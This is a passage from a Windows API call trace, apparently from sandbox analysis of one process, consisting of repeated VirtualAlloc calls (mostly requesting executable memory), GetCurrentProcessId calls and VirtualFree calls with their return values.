(lpAddress=0x0, dwSize=0xa6, flAllocationType=0x1000, flProtect=0x40) returned 0x2f80000 [0151.262] VirtualAlloc (lpAddress=0x0, dwSize=0xcb, flAllocationType=0x1000, flProtect=0x40) returned 0x2f90000 [0151.262] VirtualAlloc (lpAddress=0x0, dwSize=0xa1, flAllocationType=0x1000, flProtect=0x40) returned 0x2fa0000 [0151.263] VirtualAlloc (lpAddress=0x21fc000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x21fc000 [0151.263] GetCurrentProcessId () returned 0xeec [0151.263] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2fb0000 [0151.264] VirtualAlloc (lpAddress=0x0, dwSize=0xc5, flAllocationType=0x1000, flProtect=0x40) returned 0x2fc0000 [0151.264] VirtualAlloc (lpAddress=0x0, dwSize=0xa7, flAllocationType=0x1000, flProtect=0x40) returned 0x2fd0000 [0151.264] VirtualAlloc (lpAddress=0x0, dwSize=0xa4, flAllocationType=0x1000, flProtect=0x40) returned 0x2fe0000 [0151.265] VirtualAlloc (lpAddress=0x0, dwSize=0x281, flAllocationType=0x1000, flProtect=0x40) returned 0x2ff0000 [0151.265] VirtualAlloc (lpAddress=0x0, dwSize=0x8e, flAllocationType=0x1000, flProtect=0x40) returned 0x3000000 [0151.266] VirtualAlloc (lpAddress=0x0, dwSize=0xb7, flAllocationType=0x1000, flProtect=0x40) returned 0x3010000 [0151.266] VirtualAlloc (lpAddress=0x0, dwSize=0x9c, flAllocationType=0x1000, flProtect=0x40) returned 0x3020000 [0151.267] VirtualAlloc (lpAddress=0x0, dwSize=0xbe, flAllocationType=0x1000, flProtect=0x40) returned 0x3030000 [0151.267] VirtualAlloc (lpAddress=0x0, dwSize=0xc0, flAllocationType=0x1000, flProtect=0x40) returned 0x3040000 [0151.267] VirtualAlloc (lpAddress=0x0, dwSize=0x323, flAllocationType=0x1000, flProtect=0x40) returned 0x3050000 [0151.268] GetCurrentProcessId () returned 0xeec [0151.268] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3060000 [0151.268] VirtualAlloc (lpAddress=0x0, dwSize=0x9d, flAllocationType=0x1000, flProtect=0x40) returned 0x3070000 [0151.269] VirtualAlloc (lpAddress=0x0, dwSize=0x9a, flAllocationType=0x1000, flProtect=0x40) returned 0x3080000 [0151.269] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x1000, flProtect=0x40) returned 0x3090000 [0151.270] VirtualAlloc (lpAddress=0x0, dwSize=0x97, flAllocationType=0x1000, flProtect=0x40) returned 0x30a0000 [0151.270] VirtualAlloc (lpAddress=0x0, dwSize=0x42b, flAllocationType=0x1000, flProtect=0x40) returned 0x30b0000 [0151.271] VirtualAlloc (lpAddress=0x0, dwSize=0xac, flAllocationType=0x1000, flProtect=0x40) returned 0x30c0000 [0151.271] VirtualAlloc (lpAddress=0x0, dwSize=0x20b, flAllocationType=0x1000, flProtect=0x40) returned 0x30d0000 [0151.272] VirtualAlloc (lpAddress=0x0, dwSize=0x8f, flAllocationType=0x1000, flProtect=0x40) returned 0x30e0000 [0151.272] VirtualAlloc (lpAddress=0x0, dwSize=0x99, flAllocationType=0x1000, flProtect=0x40) returned 0x30f0000 [0151.273] VirtualAlloc (lpAddress=0x0, dwSize=0xab, flAllocationType=0x1000, flProtect=0x40) returned 0x3100000 [0151.273] GetCurrentProcessId () returned 0xeec [0151.273] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3110000 [0151.274] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x1000, flProtect=0x40) returned 0x3120000 [0151.274] VirtualAlloc (lpAddress=0x0, dwSize=0x65f, flAllocationType=0x1000, flProtect=0x40) returned 0x3130000 [0151.275] VirtualAlloc (lpAddress=0x0, dwSize=0xd2, flAllocationType=0x1000, flProtect=0x40) returned 0x3140000 [0151.275] VirtualAlloc (lpAddress=0x0, dwSize=0x9f, flAllocationType=0x1000, flProtect=0x40) returned 0x3150000 [0151.275] VirtualAlloc (lpAddress=0x0, dwSize=0xa1, flAllocationType=0x1000, flProtect=0x40) returned 0x3160000 [0151.276] VirtualAlloc (lpAddress=0x0, dwSize=0x9b, flAllocationType=0x1000, flProtect=0x40) returned 0x3170000 [0151.276] VirtualAlloc (lpAddress=0x0, dwSize=0x418, flAllocationType=0x1000, flProtect=0x40) returned 0x3180000 [0151.277] VirtualAlloc (lpAddress=0x0, dwSize=0xc0, flAllocationType=0x1000, flProtect=0x40) returned 0x3190000 [0151.277] VirtualAlloc (lpAddress=0x0, dwSize=0xd8, flAllocationType=0x1000, flProtect=0x40) returned 0x31a0000 [0151.278] VirtualAlloc (lpAddress=0x0, dwSize=0x97, flAllocationType=0x1000, flProtect=0x40) returned 0x31b0000 [0151.278] VirtualAlloc (lpAddress=0x2200000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2200000 [0151.279] GetCurrentProcessId () returned 0xeec [0151.279] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x31c0000 [0151.279] VirtualAlloc (lpAddress=0x0, dwSize=0x26a, flAllocationType=0x1000, flProtect=0x40) returned 0x31d0000 [0151.280] VirtualAlloc (lpAddress=0x0, dwSize=0x81, flAllocationType=0x1000, flProtect=0x40) returned 0x31e0000 [0151.280] VirtualAlloc (lpAddress=0x0, dwSize=0x79, flAllocationType=0x1000, flProtect=0x40) returned 0x31f0000 [0151.280] VirtualAlloc (lpAddress=0x0, dwSize=0xae, flAllocationType=0x1000, flProtect=0x40) returned 0x3200000 [0151.281] VirtualAlloc (lpAddress=0x0, dwSize=0xa4, flAllocationType=0x1000, flProtect=0x40) returned 0x3210000 [0151.281] VirtualAlloc (lpAddress=0x0, dwSize=0xb5, flAllocationType=0x1000, flProtect=0x40) returned 0x3220000 [0151.282] VirtualAlloc (lpAddress=0x0, dwSize=0xc0, flAllocationType=0x1000, flProtect=0x40) returned 0x3230000 [0151.282] VirtualAlloc (lpAddress=0x0, dwSize=0xa3, flAllocationType=0x1000, flProtect=0x40) returned 0x3240000 [0151.283] VirtualAlloc (lpAddress=0x0, dwSize=0x396, flAllocationType=0x1000, flProtect=0x40) returned 0x3250000 [0151.283] VirtualAlloc (lpAddress=0x0, dwSize=0x92, flAllocationType=0x1000, flProtect=0x40) returned 0x3260000 [0151.284] GetCurrentProcessId () returned 0xeec [0151.284] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3270000 [0151.284] VirtualAlloc (lpAddress=0x0, dwSize=0xb7, flAllocationType=0x1000, flProtect=0x40) returned 0x3280000 [0151.285] VirtualAlloc (lpAddress=0x0, dwSize=0xb2, flAllocationType=0x1000, flProtect=0x40) returned 0x3290000 [0151.286] VirtualAlloc (lpAddress=0x0, dwSize=0x521, flAllocationType=0x1000, flProtect=0x40) returned 0x32a0000 [0151.286] VirtualAlloc (lpAddress=0x0, dwSize=0xcb, flAllocationType=0x1000, flProtect=0x40) returned 0x32b0000 [0151.286] VirtualAlloc (lpAddress=0x0, dwSize=0xad, flAllocationType=0x1000, flProtect=0x40) returned 0x32c0000 [0151.287] VirtualAlloc (lpAddress=0x0, dwSize=0x9b, flAllocationType=0x1000, flProtect=0x40) returned 0x32d0000 [0151.287] VirtualAlloc (lpAddress=0x0, dwSize=0xaf, flAllocationType=0x1000, flProtect=0x40) returned 0x32e0000 [0151.288] VirtualAlloc (lpAddress=0x0, dwSize=0x88, flAllocationType=0x1000, flProtect=0x40) returned 0x32f0000 [0151.288] VirtualAlloc (lpAddress=0x0, dwSize=0xa0, flAllocationType=0x1000, flProtect=0x40) returned 0x3300000 [0151.289] VirtualAlloc (lpAddress=0x0, dwSize=0x98, flAllocationType=0x1000, flProtect=0x40) returned 0x3310000 [0151.289] VirtualAlloc (lpAddress=0x2204000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2204000 [0151.290] GetCurrentProcessId () returned 0xeec [0151.290] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3320000 [0151.290] VirtualAlloc (lpAddress=0x0, dwSize=0x8b, flAllocationType=0x1000, flProtect=0x40) returned 0x3330000 [0151.291] VirtualAlloc (lpAddress=0x0, dwSize=0x99, flAllocationType=0x1000, flProtect=0x40) returned 0x3340000 [0151.291] VirtualAlloc (lpAddress=0x0, dwSize=0xb6, flAllocationType=0x1000, flProtect=0x40) returned 0x3350000 [0151.292] VirtualAlloc (lpAddress=0x0, dwSize=0xa5, flAllocationType=0x1000, flProtect=0x40) returned 0x3360000 [0151.292] VirtualAlloc (lpAddress=0x0, dwSize=0xc0, flAllocationType=0x1000, flProtect=0x40) returned 0x3370000 [0151.293] VirtualAlloc (lpAddress=0x0, dwSize=0x86, flAllocationType=0x1000, flProtect=0x40) returned 0x3380000 [0151.293] VirtualAlloc (lpAddress=0x0, dwSize=0x91, flAllocationType=0x1000, flProtect=0x40) returned 0x3390000 [0151.294] VirtualAlloc (lpAddress=0x0, dwSize=0x98, flAllocationType=0x1000, flProtect=0x40) returned 0x33a0000 [0151.294] VirtualAlloc (lpAddress=0x0, dwSize=0x371, flAllocationType=0x1000, flProtect=0x40) returned 0x33b0000 [0151.295] VirtualAlloc (lpAddress=0x0, dwSize=0x7f, flAllocationType=0x1000, flProtect=0x40) returned 0x33c0000 [0151.295] GetCurrentProcessId () returned 0xeec [0151.295] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x33d0000 [0151.296] VirtualAlloc (lpAddress=0x0, dwSize=0xae, flAllocationType=0x1000, flProtect=0x40) returned 0x33e0000 [0151.296] VirtualAlloc (lpAddress=0x0, dwSize=0xa1, flAllocationType=0x1000, flProtect=0x40) returned 0x33f0000 [0151.297] VirtualAlloc (lpAddress=0x0, dwSize=0x327, flAllocationType=0x1000, flProtect=0x40) returned 0x3400000 [0151.297] VirtualAlloc (lpAddress=0x0, dwSize=0xb7, flAllocationType=0x1000, flProtect=0x40) returned 0x3410000 [0151.298] VirtualAlloc (lpAddress=0x0, dwSize=0xa8, flAllocationType=0x1000, flProtect=0x40) returned 0x3420000 [0151.298] VirtualAlloc (lpAddress=0x0, dwSize=0xaa, flAllocationType=0x1000, flProtect=0x40) returned 0x3430000 [0151.299] VirtualAlloc (lpAddress=0x0, dwSize=0xb7, flAllocationType=0x1000, flProtect=0x40) returned 0x3440000 [0151.299] VirtualAlloc (lpAddress=0x0, dwSize=0xc1, flAllocationType=0x1000, flProtect=0x40) returned 0x3450000 [0151.300] VirtualAlloc (lpAddress=0x0, dwSize=0xa8, flAllocationType=0x1000, flProtect=0x40) returned 0x3460000 [0151.300] VirtualAlloc (lpAddress=0x0, dwSize=0x92, flAllocationType=0x1000, flProtect=0x40) returned 0x3470000 [0151.301] GetCurrentProcessId () returned 0xeec [0151.301] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3480000 [0151.302] VirtualAlloc (lpAddress=0x0, dwSize=0xaf, flAllocationType=0x1000, flProtect=0x40) returned 0x3490000 [0151.302] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x1000, flProtect=0x40) returned 0x34a0000 [0151.303] VirtualAlloc (lpAddress=0x0, dwSize=0x9c, flAllocationType=0x1000, flProtect=0x40) returned 0x34b0000 [0151.304] VirtualAlloc (lpAddress=0x0, dwSize=0x9a, flAllocationType=0x1000, flProtect=0x40) returned 0x34c0000 [0151.305] VirtualAlloc (lpAddress=0x0, dwSize=0xb5, flAllocationType=0x1000, flProtect=0x40) returned 0x34d0000 [0151.305] VirtualAlloc (lpAddress=0x0, dwSize=0xd1, flAllocationType=0x1000, flProtect=0x40) returned 0x34e0000 [0151.306] VirtualAlloc (lpAddress=0x0, dwSize=0xb0, flAllocationType=0x1000, flProtect=0x40) returned 0x34f0000 [0151.307] VirtualAlloc (lpAddress=0x0, dwSize=0xa3, flAllocationType=0x1000, flProtect=0x40) returned 0x3500000 [0151.307] VirtualAlloc (lpAddress=0x0, dwSize=0xb3, flAllocationType=0x1000, flProtect=0x40) returned 0x3510000 [0151.308] VirtualAlloc (lpAddress=0x0, dwSize=0x1f3, flAllocationType=0x1000, flProtect=0x40) returned 0x3520000 [0151.308] GetCurrentProcessId () returned 0xeec [0151.308] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3530000 [0151.309] VirtualAlloc (lpAddress=0x0, dwSize=0x18a, flAllocationType=0x1000, flProtect=0x40) returned 0x3540000 [0151.310] VirtualAlloc (lpAddress=0x0, dwSize=0xb0, flAllocationType=0x1000, flProtect=0x40) returned 0x3550000 [0151.310] VirtualAlloc (lpAddress=0x0, dwSize=0xa9, flAllocationType=0x1000, flProtect=0x40) returned 0x3560000 [0151.311] VirtualAlloc (lpAddress=0x0, dwSize=0xaa, flAllocationType=0x1000, flProtect=0x40) returned 0x3570000 [0151.311] VirtualAlloc (lpAddress=0x0, dwSize=0x9b, flAllocationType=0x1000, flProtect=0x40) returned 0x3580000 [0151.332] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.333] GetCurrentProcessId () returned 0xeec [0151.333] GetCurrentProcessId () returned 0xeec [0151.333] GetCurrentProcessId () returned 0xeec [0151.333] GetCurrentProcessId () returned 0xeec [0151.333] GetCurrentProcessId () returned 0xeec [0151.333] GetCurrentProcessId () returned 0xeec [0151.333] GetCurrentProcessId () returned 0xeec [0151.333] GetCurrentProcessId () returned 0xeec [0151.333] GetCurrentProcessId () returned 0xeec [0151.333] GetCurrentProcessId () returned 0xeec [0151.333] GetCurrentProcessId () returned 0xeec [0151.333] GetCurrentProcessId () returned 0xeec [0151.335] GetCurrentProcessId () returned 0xeec [0151.335] GetCurrentProcessId () returned 0xeec [0151.336] GetCurrentProcessId () returned 0xeec [0151.336] GetCurrentProcessId () returned 0xeec [0151.336] GetCurrentProcessId () returned 0xeec [0151.336] GetCurrentProcessId () returned 0xeec [0151.337] GetCurrentProcessId () returned 0xeec [0151.337] GetCurrentProcessId () returned 0xeec [0151.337] GetCurrentProcessId () returned 0xeec [0151.337] GetCurrentProcessId () returned 0xeec [0151.337] GetCurrentProcessId () returned 0xeec [0151.337] GetCurrentProcessId () returned 0xeec [0151.338] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.339] GetCurrentProcessId () returned 0xeec [0151.339] GetCurrentProcessId () returned 0xeec [0151.339] GetCurrentProcessId () returned 0xeec [0151.339] GetCurrentProcessId () returned 0xeec [0151.339] GetCurrentProcessId () returned 0xeec [0151.339] GetCurrentProcessId () returned 0xeec [0151.339] GetCurrentProcessId () returned 0xeec [0151.339] GetCurrentProcessId () returned 0xeec [0151.339] GetCurrentProcessId () returned 0xeec [0151.339] GetCurrentProcessId () returned 0xeec [0151.339] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.340] GetCurrentProcessId () returned 0xeec [0151.340] GetCurrentProcessId () returned 0xeec [0151.340] GetCurrentProcessId () returned 0xeec [0151.340] GetCurrentProcessId () returned 0xeec [0151.340] GetCurrentProcessId () returned 0xeec [0151.340] GetCurrentProcessId () returned 0xeec [0151.340] GetCurrentProcessId () returned 0xeec [0151.340] GetCurrentProcessId () returned 0xeec [0151.340] GetCurrentProcessId () returned 0xeec [0151.340] GetCurrentProcessId () returned 0xeec [0151.340] GetCurrentProcessId () returned 0xeec [0151.340] GetCurrentProcessId () returned 0xeec [0151.340] GetCurrentProcessId () returned 0xeec [0151.340] GetCurrentProcessId () returned 0xeec [0151.340] GetCurrentProcessId () returned 0xeec [0151.340] GetCurrentProcessId () returned 0xeec [0151.340] GetCurrentProcessId () returned 0xeec [0151.340] GetCurrentProcessId () returned 0xeec [0151.340] GetCurrentProcessId () returned 0xeec [0151.340] GetCurrentProcessId () returned 0xeec [0151.340] GetCurrentProcessId () returned 0xeec [0151.340] GetCurrentProcessId () returned 0xeec [0151.340] GetCurrentProcessId () returned 0xeec [0151.340] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.341] GetCurrentProcessId () returned 0xeec [0151.342] GetCurrentProcessId () returned 0xeec [0151.342] GetCurrentProcessId () returned 0xeec [0151.342] GetCurrentProcessId () returned 0xeec [0151.342] GetCurrentProcessId () returned 0xeec [0151.342] GetCurrentProcessId () returned 0xeec [0151.342] GetCurrentProcessId () returned 0xeec [0151.342] GetCurrentProcessId () returned 0xeec [0151.342] GetCurrentProcessId () returned 0xeec [0151.342] GetCurrentProcessId () returned 0xeec [0151.342] GetCurrentProcessId () returned 0xeec [0151.342] GetCurrentProcessId () returned 0xeec [0151.342] GetCurrentProcessId () returned 0xeec [0151.342] GetCurrentProcessId () returned 0xeec [0151.342] GetCurrentProcessId () returned 0xeec [0151.342] GetCurrentProcessId () returned 0xeec [0151.342] GetCurrentProcessId () returned 0xeec [0151.342] GetCurrentProcessId () returned 0xeec [0151.342] GetCurrentProcessId () returned 0xeec [0151.342] GetCurrentProcessId () returned 0xeec [0151.342] GetCurrentProcessId () returned 0xeec [0151.342] GetCurrentProcessId () returned 0xeec [0151.342] GetCurrentProcessId () returned 0xeec [0151.342] GetCurrentProcessId () returned 0xeec [0151.342] GetCurrentProcessId () returned 0xeec [0151.342] GetCurrentProcessId () returned 0xeec [0151.342] GetCurrentProcessId () returned 0xeec [0151.342] GetCurrentProcessId () returned 0xeec [0151.342] GetCurrentProcessId () returned 0xeec [0151.342] GetCurrentProcessId () returned 0xeec [0151.342] GetCurrentProcessId () returned 0xeec [0151.342] GetCurrentProcessId () returned 0xeec [0151.342] GetCurrentProcessId () returned 0xeec [0151.342] GetCurrentProcessId () returned 0xeec [0151.342] GetCurrentProcessId () returned 0xeec [0151.342] GetCurrentProcessId () returned 0xeec [0151.342] GetCurrentProcessId () returned 0xeec [0151.342] GetCurrentProcessId () returned 0xeec [0151.342] GetCurrentProcessId () returned 0xeec [0151.342] GetCurrentProcessId () returned 0xeec [0151.343] GetCurrentProcessId () returned 0xeec [0151.343] GetCurrentProcessId () returned 0xeec [0151.343] GetCurrentProcessId () returned 0xeec [0151.343] GetCurrentProcessId () returned 0xeec [0151.343] GetCurrentProcessId () returned 0xeec [0151.343] GetCurrentProcessId () returned 0xeec [0151.343] GetCurrentProcessId () returned 0xeec [0151.343] GetCurrentProcessId () returned 0xeec [0151.343] GetCurrentProcessId () returned 0xeec [0151.343] GetCurrentProcessId () returned 0xeec [0151.343] GetCurrentProcessId () returned 0xeec [0151.343] GetCurrentProcessId () returned 0xeec [0151.343] GetCurrentProcessId () returned 0xeec [0151.343] GetCurrentProcessId () returned 0xeec [0151.343] GetCurrentProcessId () returned 0xeec [0151.343] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.344] GetCurrentProcessId () returned 0xeec [0151.344] GetCurrentProcessId () returned 0xeec [0151.344] GetCurrentProcessId () returned 0xeec [0151.344] GetCurrentProcessId () returned 0xeec [0151.344] GetCurrentProcessId () returned 0xeec [0151.344] GetCurrentProcessId () returned 0xeec [0151.344] GetCurrentProcessId () returned 0xeec [0151.344] GetCurrentProcessId () returned 0xeec [0151.344] GetCurrentProcessId () returned 0xeec [0151.344] GetCurrentProcessId () returned 0xeec [0151.344] GetCurrentProcessId () returned 0xeec [0151.345] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.346] GetCurrentProcessId () returned 0xeec [0151.346] GetCurrentProcessId () returned 0xeec [0151.346] GetCurrentProcessId () returned 0xeec [0151.346] GetCurrentProcessId () returned 0xeec [0151.346] GetCurrentProcessId () returned 0xeec [0151.346] GetCurrentProcessId () returned 0xeec [0151.346] GetCurrentProcessId () returned 0xeec [0151.346] GetCurrentProcessId () returned 0xeec [0151.346] GetCurrentProcessId () returned 0xeec [0151.346] GetCurrentProcessId () returned 0xeec [0151.346] GetCurrentProcessId () returned 0xeec [0151.346] GetCurrentProcessId () returned 0xeec [0151.346] GetCurrentProcessId () returned 0xeec [0151.346] GetCurrentProcessId () returned 0xeec [0151.346] GetCurrentProcessId () returned 0xeec [0151.346] GetCurrentProcessId () returned 0xeec [0151.346] GetCurrentProcessId () returned 0xeec [0151.346] GetCurrentProcessId () returned 0xeec [0151.346] GetCurrentProcessId () returned 0xeec [0151.346] GetCurrentProcessId () returned 0xeec [0151.346] GetCurrentProcessId () returned 0xeec [0151.346] GetCurrentProcessId () returned 0xeec [0151.346] GetCurrentProcessId () returned 0xeec [0151.346] GetCurrentProcessId () returned 0xeec [0151.346] GetCurrentProcessId () returned 0xeec [0151.346] GetCurrentProcessId () returned 0xeec [0151.346] GetCurrentProcessId () returned 0xeec [0151.346] GetCurrentProcessId () returned 0xeec [0151.346] GetCurrentProcessId () returned 0xeec [0151.346] GetCurrentProcessId () returned 0xeec [0151.346] GetCurrentProcessId () returned 0xeec [0151.346] GetCurrentProcessId () returned 0xeec [0151.346] GetCurrentProcessId () returned 0xeec [0151.347] GetCurrentProcessId () returned 0xeec [0151.347] GetCurrentProcessId () returned 0xeec [0151.347] GetCurrentProcessId () returned 0xeec [0151.347] GetCurrentProcessId () returned 0xeec [0151.347] GetCurrentProcessId () returned 0xeec [0151.347] GetCurrentProcessId () returned 0xeec [0151.347] GetCurrentProcessId () returned 0xeec [0151.347] GetCurrentProcessId () returned 0xeec [0151.347] GetCurrentProcessId () returned 0xeec [0151.347] GetCurrentProcessId () returned 0xeec [0151.384] GetCurrentProcessId () returned 0xeec [0151.384] GetCurrentProcessId () returned 0xeec [0151.384] GetCurrentProcessId () returned 0xeec [0151.384] GetCurrentProcessId () returned 0xeec [0151.384] GetCurrentProcessId () returned 0xeec [0151.384] GetCurrentProcessId () returned 0xeec [0151.384] GetCurrentProcessId () returned 0xeec [0151.384] GetCurrentProcessId () returned 0xeec [0151.384] GetCurrentProcessId () returned 0xeec [0151.384] GetCurrentProcessId () returned 0xeec [0151.384] GetCurrentProcessId () returned 0xeec [0151.384] GetCurrentProcessId () returned 0xeec [0151.384] GetCurrentProcessId () returned 0xeec [0151.384] GetCurrentProcessId () returned 0xeec [0151.384] GetCurrentProcessId () returned 0xeec [0151.384] GetCurrentProcessId () returned 0xeec [0151.384] GetCurrentProcessId () returned 0xeec [0151.384] GetCurrentProcessId () returned 0xeec [0151.384] GetCurrentProcessId () returned 0xeec [0151.384] GetCurrentProcessId () returned 0xeec [0151.384] GetCurrentProcessId () returned 0xeec [0151.384] GetCurrentProcessId () returned 0xeec [0151.384] GetCurrentProcessId () returned 0xeec [0151.384] GetCurrentProcessId () returned 0xeec [0151.384] GetCurrentProcessId () returned 0xeec [0151.384] GetCurrentProcessId () returned 0xeec [0151.384] GetCurrentProcessId () returned 0xeec [0151.384] GetCurrentProcessId () returned 0xeec [0151.384] GetCurrentProcessId () returned 0xeec [0151.384] GetCurrentProcessId () returned 0xeec [0151.385] GetCurrentProcessId () returned 0xeec [0151.385] GetCurrentProcessId () returned 0xeec [0151.385] GetCurrentProcessId () returned 0xeec [0151.385] GetCurrentProcessId () returned 0xeec [0151.385] GetCurrentProcessId () returned 0xeec [0151.385] GetCurrentProcessId () returned 0xeec [0151.385] GetCurrentProcessId () returned 0xeec [0151.385] GetCurrentProcessId () returned 0xeec [0151.385] GetCurrentProcessId () returned 0xeec [0151.385] GetCurrentProcessId () returned 0xeec [0151.385] GetCurrentProcessId () returned 0xeec [0151.385] GetCurrentProcessId () returned 0xeec [0151.386] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.388] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.389] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.390] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.392] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.393] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.395] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.396] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.397] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.398] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.400] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.407] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.409] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.411] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.412] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.413] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.414] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.415] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.416] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.417] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.418] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.419] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.421] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.422] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.460] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.461] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.463] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.464] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.465] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.466] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.468] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.469] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.470] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.471] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.473] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.474] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.475] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.476] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.613] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.615] VirtualFree (lpAddress=0x3610000, 